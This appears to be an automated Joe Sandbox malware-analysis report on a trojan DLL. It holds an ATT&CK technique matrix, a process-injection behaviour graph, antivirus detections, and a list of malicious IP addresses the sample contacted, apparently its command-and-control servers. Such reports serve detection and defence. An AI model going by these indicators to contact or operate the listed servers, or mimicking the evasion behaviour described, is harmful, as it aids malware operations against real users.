                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)File Deletion1NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading2LSA SecretsSecurity Software Discovery41SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion2Cached Domain CredentialsVirtualization/Sandbox Evasion2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Regsvr321/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553353 Sample: nV5Wu77N8J Startdate: 14/01/2022 Architecture: WINDOWS Score: 92 40 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->40 42 85.214.67.203 STRATOSTRATOAGDE Germany 2->42 44 23 other IPs or domains 2->44 52 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->52 54 Found malware configuration 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 3 other signatures 2->58 9 loaddll32.exe 1 2->9         started        11 svchost.exe 4 2->11         started        13 svchost.exe 1 2->13         started        15 3 other processes 2->15 signatures3 process4 process5 17 rundll32.exe 2 9->17         started        20 cmd.exe 1 9->20         started        22 regsvr32.exe 9->22         started        24 WerFault.exe 3 9 9->24         started        26 WerFault.exe 11->26         started        signatures6 50 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->50 28 rundll32.exe 17->28         started        30 rundll32.exe 20->30         started        32 rundll32.exe 22->32         started        process7 process8 34 rundll32.exe 28->34         started        38 rundll32.exe 2 30->38         started        dnsIp9 46 45.138.98.34, 49770, 80 M247GB Germany 34->46 48 69.16.218.101, 49771, 8080 LIQUIDWEBUS United States 34->48 60 System process connects to network (likely due to code injection or exploit) 34->60 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->62 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      nV5Wu77N8J.dll17%VirustotalBrowse
                      nV5Wu77N8J.dll14%ReversingLabs

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      14.2.rundll32.exe.5030000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                      14.2.rundll32.exe.55b0000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.5510000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.53e0000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.loaddll32.exe.de0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      11.2.rundll32.exe.4780000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.52a0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.53b0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.4cb0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.52d0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                      14.2.rundll32.exe.2e30000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.rundll32.exe.4770000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.0.loaddll32.exe.de0000.3.unpack100%AviraHEUR/AGEN.1145233Download File
                      0.0.loaddll32.exe.de0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      0.0.loaddll32.exe.e10000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.56f0000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.5570000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.5540000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.49d0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.5a20000.20.unpack100%AviraHEUR/AGEN.1145233Download File
                      14.2.rundll32.exe.59d0000.19.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.regsvr32.exe.2510000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      3.2.rundll32.exe.4740000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      11.2.rundll32.exe.4750000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      14.2.rundll32.exe.5300000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.4c80000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      2.2.regsvr32.exe.2540000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.rundll32.exe.52a0000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.55e0000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.57a0000.16.unpack100%AviraHEUR/AGEN.1145233Download File
                      14.2.rundll32.exe.5a50000.21.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.57d0000.17.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.rundll32.exe.52f0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.rundll32.exe.5210000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                      6.2.rundll32.exe.3500000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.5140000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.5060000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.5270000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                      14.2.rundll32.exe.5110000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                      0.0.loaddll32.exe.e10000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.49a0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                      14.2.rundll32.exe.59a0000.18.unpack100%AviraHEUR/AGEN.1145233Download File
                      6.2.rundll32.exe.34d0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                      6.2.rundll32.exe.5160000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.2.rundll32.exe.5130000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                      4.2.rundll32.exe.52b0000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                      6.2.rundll32.exe.5270000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                      14.2.rundll32.exe.56c0000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                      6.2.rundll32.exe.5240000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      14.2.rundll32.exe.2e00000.0.unpack100%AviraHEUR/AGEN.1145233Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000014.00000003.798251058.0000020B3A790000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.798329573.0000020B3A76E000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crl.ver)svchost.exe, 00000014.00000002.822309970.0000020B39EE9000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000014.00000003.798251058.0000020B3A790000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.798329573.0000020B3A76E000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://upx.sf.netAmcache.hve.16.drfalse
                        high
                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000014.00000003.800900762.0000020B3AC02000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.800918679.0000020B3A790000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.800834222.0000020B3AC19000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.800807896.0000020B3AC19000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.800791461.0000020B3A7A1000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.800774631.0000020B3A790000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://help.disneyplus.com.svchost.exe, 00000014.00000003.798251058.0000020B3A790000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.798329573.0000020B3A76E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://disneyplus.com/legal.svchost.exe, 00000014.00000003.798251058.0000020B3A790000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.798329573.0000020B3A76E000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        207.148.81.119
                        unknownUnited States
                        20473AS-CHOOPAUStrue
                        104.131.62.48
                        unknownUnited States
                        14061DIGITALOCEAN-ASNUStrue
                        85.214.67.203
                        unknownGermany
                        6724STRATOSTRATOAGDEtrue
                        191.252.103.16
                        unknownBrazil
                        27715LocawebServicosdeInternetSABRtrue
                        168.197.250.14
                        unknownArgentina
                        264776OmarAnselmoRipollTDCNETARtrue
                        66.42.57.149
                        unknownUnited States
                        20473AS-CHOOPAUStrue
                        185.148.168.15
                        unknownGermany
                        44780EVERSCALE-ASDEtrue
                        51.210.242.234
                        unknownFrance
                        16276OVHFRtrue
                        217.182.143.207
                        unknownFrance
                        16276OVHFRtrue
                        69.16.218.101
                        unknownUnited States
                        32244LIQUIDWEBUStrue
                        159.69.237.188
                        unknownGermany
                        24940HETZNER-ASDEtrue
                        45.138.98.34
                        unknownGermany
                        9009M247GBtrue
                        116.124.128.206
                        unknownKorea Republic of
                        9318SKB-ASSKBroadbandCoLtdKRtrue
                        78.46.73.125
                        unknownGermany
                        24940HETZNER-ASDEtrue
                        37.59.209.141
                        unknownFrance
                        16276OVHFRtrue
                        210.57.209.142
                        unknownIndonesia
                        38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                        185.148.168.220
                        unknownGermany
                        44780EVERSCALE-ASDEtrue
                        54.37.228.122
                        unknownFrance
                        16276OVHFRtrue
                        190.90.233.66
                        unknownColombia
                        18678INTERNEXASAESPCOtrue
                        142.4.219.173
                        unknownCanada
                        16276OVHFRtrue
                        54.38.242.185
                        unknownFrance
                        16276OVHFRtrue
                        195.154.146.35
                        unknownFrance
                        12876OnlineSASFRtrue
                        195.77.239.39
                        unknownSpain
                        60493FICOSA-ASEStrue
                        78.47.204.80
                        unknownGermany
                        24940HETZNER-ASDEtrue
                        37.44.244.177
                        unknownGermany
                        47583AS-HOSTINGERLTtrue
                        62.171.178.147
                        unknownUnited Kingdom
                        51167CONTABODEtrue
                        128.199.192.135
                        unknownUnited Kingdom
                        14061DIGITALOCEAN-ASNUStrue

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:553353
                        Start date:14.01.2022
                        Start time:18:49:15
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 14m 12s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:nV5Wu77N8J (renamed file extension from none to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:27
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal92.troj.evad.winDLL@27/10@0/27
                        EGA Information:
                        • Successful, ratio: 80%
                        HDC Information:
                        • Successful, ratio: 31.9% (good quality ratio 30%)
                        • Quality average: 74.1%
                        • Quality standard deviation: 26.4%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 51
                        • Number of non-executed functions: 135
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.4.50, 20.54.110.249, 40.91.112.76
                        • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, b1ns.c-0001.c-msedge.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, b1ns.au-msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        18:51:13API Interceptor7x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        207.148.81.119OZra.dllGet hashmaliciousBrowse
                          RQ6mxb6ssDtBoLUIE.dllGet hashmaliciousBrowse
                            EcJ8rbg.dllGet hashmaliciousBrowse
                              gyZm68Cgwf.dllGet hashmaliciousBrowse
                                5o8zdV3GU3.dllGet hashmaliciousBrowse
                                  aoPHg7b78c.dllGet hashmaliciousBrowse
                                    xxWrY2YG7s.dllGet hashmaliciousBrowse
                                      7MhGa3iotM.dllGet hashmaliciousBrowse
                                        vHwdqVl8yP.dllGet hashmaliciousBrowse
                                          M2hsMd9hTq.dllGet hashmaliciousBrowse
                                            wg1bXKYOOs.dllGet hashmaliciousBrowse
                                              8ozP45Xn3V.dllGet hashmaliciousBrowse
                                                pugKLanrj3.dllGet hashmaliciousBrowse
                                                  CSxylfUJcL.dllGet hashmaliciousBrowse
                                                    nCiZXrlB39.dllGet hashmaliciousBrowse
                                                      bEK6Xc41qp.dllGet hashmaliciousBrowse
                                                        vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                          wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsmGet hashmaliciousBrowse
                                                              qJQ5zHpsbm.dllGet hashmaliciousBrowse
                                                                104.131.62.48OZra.dllGet hashmaliciousBrowse
                                                                  RQ6mxb6ssDtBoLUIE.dllGet hashmaliciousBrowse
                                                                    EcJ8rbg.dllGet hashmaliciousBrowse
                                                                      gyZm68Cgwf.dllGet hashmaliciousBrowse
                                                                        5o8zdV3GU3.dllGet hashmaliciousBrowse
                                                                          aoPHg7b78c.dllGet hashmaliciousBrowse
                                                                            xxWrY2YG7s.dllGet hashmaliciousBrowse
                                                                              7MhGa3iotM.dllGet hashmaliciousBrowse
                                                                                vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                  M2hsMd9hTq.dllGet hashmaliciousBrowse
                                                                                    wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                      8ozP45Xn3V.dllGet hashmaliciousBrowse
                                                                                        pugKLanrj3.dllGet hashmaliciousBrowse
                                                                                          CSxylfUJcL.dllGet hashmaliciousBrowse
                                                                                            nCiZXrlB39.dllGet hashmaliciousBrowse
                                                                                              bEK6Xc41qp.dllGet hashmaliciousBrowse
                                                                                                vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                  wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                    SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsmGet hashmaliciousBrowse
                                                                                                      qJQ5zHpsbm.dllGet hashmaliciousBrowse

                                                                                                        Domains

                                                                                                        No context

                                                                                                        ASN

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                        AS-CHOOPAUS1nJGU59JPU.exeGet hashmaliciousBrowse
                                                                                                        • 136.244.117.138
                                                                                                        kGl1qp3Ox8.exeGet hashmaliciousBrowse
                                                                                                        • 149.28.78.238
                                                                                                        OZra.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        RQ6mxb6ssDtBoLUIE.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        EcJ8rbg.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        Comrpobante_60.vbsGet hashmaliciousBrowse
                                                                                                        • 149.248.50.230
                                                                                                        sample.jsGet hashmaliciousBrowse
                                                                                                        • 45.76.154.237
                                                                                                        gyZm68Cgwf.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        5o8zdV3GU3.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        aoPHg7b78c.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        xxWrY2YG7s.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        7MhGa3iotM.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        vHwdqVl8yP.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        M2hsMd9hTq.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        wg1bXKYOOs.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        8ozP45Xn3V.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        pugKLanrj3.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        CSxylfUJcL.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        nCiZXrlB39.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        bEK6Xc41qp.dllGet hashmaliciousBrowse
                                                                                                        • 66.42.57.149
                                                                                                        DIGITALOCEAN-ASNUSvk8A1dXh5C.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        GahImDA8DA.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        prkVkqYIwv.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        OZra.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        RQ6mxb6ssDtBoLUIE.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        EcJ8rbg.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        P42zLwaJQk.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        9ro85QVN0F.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        hWLlYv2MAXGet hashmaliciousBrowse
                                                                                                        • 159.89.53.206
                                                                                                        sample.jsGet hashmaliciousBrowse
                                                                                                        • 138.197.222.36
                                                                                                        Mc7TWWp1Vp.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        sbxGIUIhRd.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        6zsU4O4WHq.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199
                                                                                                        Bank Swift Copy 1027263738.exeGet hashmaliciousBrowse
                                                                                                        • 178.128.244.245
                                                                                                        gyZm68Cgwf.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        5o8zdV3GU3.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        aoPHg7b78c.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        xxWrY2YG7s.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        7MhGa3iotM.dllGet hashmaliciousBrowse
                                                                                                        • 128.199.192.135
                                                                                                        urMpgNNXPM.exeGet hashmaliciousBrowse
                                                                                                        • 188.166.28.199

                                                                                                        JA3 Fingerprints

                                                                                                        No context

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_12a180e49793e381a8b848106c2e1caa7a6a4277_7cac0383_0ffd4626\Report.wer
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):0.7958908003747792
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:gtrh2nYyay9haol7Jf0pXIQcQSc6mcEUcw3/s+a+z+HbHg1VG4rmMoVazWvMOpNZ:gdunoHsieryjNq/u7seS274ItW
                                                                                                        MD5:CC2ED1887CF43DF87605ACE581A8646C
                                                                                                        SHA1:550A0F8D4875DDE3241376F32EA4319F995E80AA
                                                                                                        SHA-256:2A1C0F968CC272E23942C7A0DE2550330F1D6BAA7B5D7CDB3D0C9EDF63E4704D
                                                                                                        SHA-512:A05A8654EBB4CDEAA2C964D7880CC6640A68CF90BE7EB2CE7110CF774751F2FA6546123E45FF9763CD84B39B5C79B07F085D870C3A4B24F92863B9ECF2B1A7FE
                                                                                                        Malicious:false
                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.5.6.2.4.0.2.0.6.0.7.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.b.5.1.f.7.2.-.7.4.5.f.-.4.6.c.a.-.9.4.6.d.-.0.f.2.2.d.a.9.f.6.1.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.e.d.6.1.2.2.8.-.d.a.4.6.-.4.e.3.3.-.a.1.3.6.-.9.d.3.d.a.e.5.6.8.a.e.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.8.-.0.0.0.1.-.0.0.1.b.-.0.8.4.5.-.4.1.2.c.6.f.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F33.tmp.dmp
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:Mini DuMP crash report, 15 streams, Fri Jan 14 17:50:41 2022, 0x1205a4 type
                                                                                                        Category:dropped
                                                                                                        Size (bytes):44328
                                                                                                        Entropy (8bit):2.1255697233673803
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:6vUI/5hbOiYNH+PieACib4nfnzOgPUEYMw/xZUWbKboJyrPun+MN:8biiYH+aaOgTYMw/kWbKboQMN
                                                                                                        MD5:DC01F206F671FB8F58F9AA9658616573
                                                                                                        SHA1:698402D4CB0A56F16C96CC6FF9C7B2CC51C8D6F1
                                                                                                        SHA-256:43038B7DC644076824E4557DE0C176126850EE890D718752E4997773D5948B2C
                                                                                                        SHA-512:5887CCEE773D35B702C9AF1A452D57C7C288A8E63141269152E4556787331FCD37A7B60B7F77E92B740B69409D5416CC87030CCE2E898ED17A5E0901EB784EC9
                                                                                                        Malicious:false
                                                                                                        Preview: MDMP....... .........a....................................$...T............%..........`.......8...........T...............(...........x...........d....................................................................U...........B..............GenuineIntelW...........T.............a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER357E.tmp.WERInternalMetadata.xml
                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8352
                                                                                                        Entropy (8bit):3.698245170232573
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Rrl7r3GLNieg6HDG6Yr8SUJzzgmfdSwGY+pB289bqHsfBdum:RrlsNix6HDG6YgSUJzzgmfdSwAqMf7
                                                                                                        MD5:7E0377FAAB1AD65AB85DA6CD5994D55C
                                                                                                        SHA1:BAE2C81841F7387CEF5D048B0822AD874695907B
                                                                                                        SHA-256:D187E67B5FFD076BFFCB4C6A7A3C0ACC88655A148F03ADFEDF52B2F2917884CF
                                                                                                        SHA-512:C203C207A0759E8037725128528C0E628973195243726B8FE4A122C3288D821AA40DC2E15BA5DC97CAF5A8110F94EBAFDB809389078545027B3EF494F809039C
                                                                                                        Malicious:false
